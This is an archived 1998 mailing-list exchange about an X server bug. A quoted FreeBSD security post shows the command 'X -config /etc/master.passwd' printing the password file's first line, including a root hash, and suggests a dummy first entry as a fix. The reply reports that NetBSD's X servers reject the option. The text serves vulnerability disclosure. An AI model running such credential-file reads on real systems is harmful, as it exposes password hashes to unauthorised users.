It doesn't seem that the X servers that come with NetBSD have the
"-config" option.  Even trying other command-line options (-co, -sp)
that take filenames give errors like:

	Couldn't open RGB_DB '/etc/master.passwd'

This was tried on a pmax, a shark and an i386.

Simon.
--
On Sat, 17 Oct 1998 16:16:33 +1000  Darren Reed wrote:

> From owner-freebsd-security@FreeBSD.ORG Fri Oct 16 15:28:13 EST 1998 remote from cheops
> Date: Fri, 16 Oct 1998 18:08:02 +1300 (NZDT)
> From: Andrew McNaughton <andrew@squiz.co.nz>
> X-Sender: andrew@aniwa.sky
> Reply-To: andrew@squiz.co.nz
> To: security@FreeBSD.ORG
> Subject: X allows ordinary user to read first line of any file
> Message-Id: <Pine.BSF.4.01.9810161756550.706-100000@aniwa.sky>
> Mime-Version: 1.0
> Content-Type: TEXT/PLAIN; charset=US-ASCII
> Sender: avalon
> X-Loop: FreeBSD.org
> 
> 
> found this on http://www.hoobie.net/security/exploits/
> 
> joeuser@host$ X -config /etc/master.passwd
> Unrecognized option: root:yd0Rj.v.r1wKA:0:0::0:0:Charlie
> use: X [:<display>] [option]
> .
> .
> .
> 
> I'm sure there's other files where this can be a problem, but in the case
> of the password file it seems wise to have a dummy entry as the first line
> of the master.passwd file.
> 
> 
> Andrew McNaughton